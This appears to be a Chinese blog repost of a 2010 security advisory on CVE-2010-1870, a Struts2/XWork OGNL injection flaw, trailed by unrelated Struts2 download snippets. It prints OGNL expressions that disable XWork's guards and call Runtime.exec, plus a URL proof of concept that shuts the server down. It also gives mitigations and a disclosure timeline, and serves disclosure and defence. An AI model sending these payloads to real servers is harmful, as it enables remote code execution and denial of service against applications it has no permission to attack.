备忘下,TMD delicious现在都搞定老不爽了 。。。
CVE-2010-1870: Struts2/XWork remote command execution |
Update Tue Jul 13 2010: Added proof of concept |
Apache Struts team has announced uploaded but has not released, due to an unreasonably prolonged voting process, the 2.2.0 release of the Struts2 web framework which fixes vulnerability that I've reported to them on May 31st 2010. Apache Struts team is ridiculously slow in releasing the fixed version and all of my attempts to expedite the process have failed. |
Struts2 is Struts + WebWork. WebWork in turn uses XWork to invoke actions and call appropriate setters/getters based on HTTP parameter names, which is achieved by treating each HTTP parameter name as an OGNL statement. OGNL (Object Graph Navigation Language) is what turns: |
user.address.city=Bishkek&user['favoriteDrink']=kumys |
action.getUser().getAddress().setCity("Bishkek") |
action.getUser().setFavoriteDrink("kumys") |
This is performed by the ParametersInterceptor, which calls ValueStack.setValue() with user-supplied HTTP parameters as arguments. |
NOTE: If you are using XWork's ParametersInterceptor or operate with OGNL ValueStack in a similar way then you are vulnerable (ParametersInterceptor is on by default in struts-default.xml). |
In addition to property getting/setting, OGNL supports many more features: |
* Static method calling: @java.lang.System@exit(1)
|
* Constructor calling: new MyClass()
|
* Ability to work with context variables: #foo = new MyClass()
|
Since HTTP parameter names are OGNL statements, to prevent an attacker from calling arbitrary methods via HTTP parameters XWork has the following two variables guarding methods execution: |
* OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution' (set to true by default)
|
* SecurityMemberAccess private field called 'allowStaticMethodAccess' (set to false by default)
|
To make it easier for developer to access various frequently needed objects XWork provides several predefined context variables: |
These variables represent various server-side objects, such as session map. To prevent attackers from tampering with server-side objects XWork's ParametersInterceptor disallowed # in parameter names. About a year ago I found a way to bypass that protection(XW-641) using Java's unicode String representation: \u0023. At the time I felt like the fix that was implemented (OGNL value stack clearing) was insufficient, but had not time to investigate this further. |
Earlier this year I finally got a chance to look at this again and found that in addition to the above mentioned context variables there were more: |
* #context - OgnlContext, the one guarding method execution based on 'xwork.MethodAccessor.denyMethodExecution' property value.
|
* #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess' field prevented static method execution.
|
You can probably see the problem already. Using XW-641 trick I was able to modify the values that were guarding Java methods execution and run arbitrary Java code: |
#_memberAccess['allowStaticMethodAccess'] = true |
#foo = new java .lang.Boolean("false") |
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo |
#rt = @java.lang.Runtime@getRuntime() |
#rt.exec('mkdir /tmp/PWNED') |
Actual proof of concept had to use OGNL's expression evaluation when crafting HTTP request. PoC for this bug will be published on July 12 2010. To test whether your application is vulnerable you can use the following proof of concept, which will call java.lang.Runtime.getRuntime().exit(1): |
http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.den |
yMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRunti |
Struts2 users must upgrade to the 2.2.0, which whitelists a set of characters that excludes characters required to exploit this vulnerability. |
In cases where upgrade isn't possible you can use ParameterInterceptor's "excludeParams" parameter to whitelist the characters required for your application to operate correctly(usually A-z0-9_.'"[]) alternatively you can blacklist \()@ which are the characters required to exploit this bug. |
May 31st - email to security@struts.apache.org with vulnerability report. |
June 4th - no response received, contacted developers again. |
June 5th - had to find an XWork developer on IRC to look at this. |
June 16th - Atlassian fixes vulnerability in its products. Atlassian and Struts developers worked together in coming up with the fix. |
June 20th - 1-line fix commited |
June 29th - Struts 2.2.0 release voting process started and is still going... |
分享到:
相关推荐
### Struts2框架搭建及配置详解 #### 一、Struts2框架简介 Struts2是Struts的一个改进版本,它结合了WebWork框架和Struts框架的优点,并且增加了许多新特性,使得开发者能够更加方便地开发Java Web应用程序。...
在Struts2框架中,`<sx:>`标签是Struts2 XWork库的一部分,用于增强JSP页面的功能,提供更强大的数据绑定和表单处理能力。本篇将重点讲解如何利用`sx:`标签实现组合查询和带分页功能。 首先,让我们了解下Struts2的...
struts2下的Xwork2源文件 在 opensymphony开源社区http://www.opensymphony.com/ 可匿名使用SVN checkout xwork2的源代码 http://svn.opensymphony.com/svn/xwork/trunk
论坛系统(Struts 2+Hibernate+Spring实现)<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE validators SYSTEM ...
Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档
<bean type="com.opensymphony.xwork2.ObjectFactory" name="struts" class="org.apache.struts2.impl.StrutsObjectFactory"/> <bean type=...
Struts2是一个强大的Java web开发框架,它基于MVC(Model-View-Controller)设计模式,为开发者提供了构建可维护性、可扩展性良好的应用程序的工具和机制。在这个"简单的Struts2小程序"中,我们可以深入理解Struts2...
而XWork是Struts2的核心组件,它负责处理Action的业务逻辑和控制流程。在深入理解Struts2与XWork的关系之前,我们首先需要了解MVC模式的基本概念。 MVC模式是一种软件设计模式,它将应用程序分为三个主要部分:模型...
根据提供的文件信息,我们可以深入探讨Struts2与XWork2的相关知识点,特别是关于它们的下载、功能特性以及在实际项目中的应用。 ### Struts2框架简介 Apache Struts2是基于MVC(Model-View-Controller)设计模式的...
其他依赖如`struts2-core-2.3.14.jar`,`xwork-core-2.3.14.jar`等,都是Struts2框架的核心组件,它们提供了动作调度、拦截器、类型转换、结果类型等核心功能。`javassist-3.11.0.GA.jar`用于动态类生成,`ognl-...
XWork是Struts2的核心组件,负责处理请求、动作调度、数据绑定以及异常处理等核心功能。本文将深入探讨XWork的源码,解析其设计理念和关键实现,帮助开发者更好地理解和使用Struts2。 1. **ActionInvocation**:...
4. **struts2-tiles-plugin-2.0.6.jar**:Struts2 Tiles插件。 5. **struts2-core-2.0.6.jar**:Struts2核心库。 6. **xwork-2.0.1.jar**:XWork核心库,用于处理用户请求。 #### 三、配置web.xml 接下来,在项目的...
Struts2框架提供了一种简单有效的方式来解决这一问题,即通过`<s:token/>`标签和相关的拦截器机制来实现。 #### 二、Struts2框架简介 Struts2是一个基于Java的开源Web应用框架,它继承了Struts1的优点,并且进行了...
<filter-name>struts2</filter-name> <filter-class> org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter </filter-class> </filter> <filter-mapping> <filter-name>struts2</filter-...
<filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</filter-class> </filter> <filter-mapping> <filter-name>struts2</filter-name> <url-pattern>/*</url-pattern> </...
Struts2是基于Model-View-Controller(MVC)设计模式的开源框架,而Xwork是它的一个核心组件,负责处理Action和业务逻辑。 **Struts2** 是一个强大的MVC框架,它的出现是为了改进原先的Struts1框架,提供了更灵活、...
XWork是Struts2的核心,它提供了一系列的工具和功能,使得开发者能够更高效地处理请求、控制业务流程以及管理应用状态。2.3.16是Struts2的一个稳定版本,包含了许多修复和改进。 XWork Doc文档集是关于Struts2 ...
Struts2和XWork2是两个非常重要的Java Web框架,它们在开发企业级应用程序时扮演着核心角色。Struts2是基于MVC(Model-View-Controller)设计模式的开源框架,而XWork2则是其底层的核心工作引擎,负责处理Action、...
Struts2是一个强大的MVC(Model-View-Controller)框架,广泛应用于Java Web开发中。在Struts2中,Action是核心组件,负责处理用户的请求并进行业务逻辑处理。本教程将深入讲解如何在Ant环境下编写Struts2的Action。...